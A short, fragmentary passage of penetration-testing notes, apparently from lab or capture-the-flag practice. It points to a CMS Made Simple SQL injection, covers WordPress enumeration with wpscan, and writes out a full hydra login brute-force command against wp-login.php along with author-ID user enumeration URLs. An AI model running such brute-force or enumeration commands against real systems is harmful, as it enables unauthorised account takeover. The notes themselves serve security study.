-
Before < 2.2.10 : SQL injection possible (https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html)
-
Enumeration Github wpscan --url $target Maybe an API token could be useful — then, the WordPress Vulnerability Database is used. Login brute force hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Check users: http://spectra.htb/main/?author=1 http://spectra.htb/main/?author=2 … Most beautiful wordpress plugin XSS injection If there is a way to inject code somewhere (e.g. via a plugin)…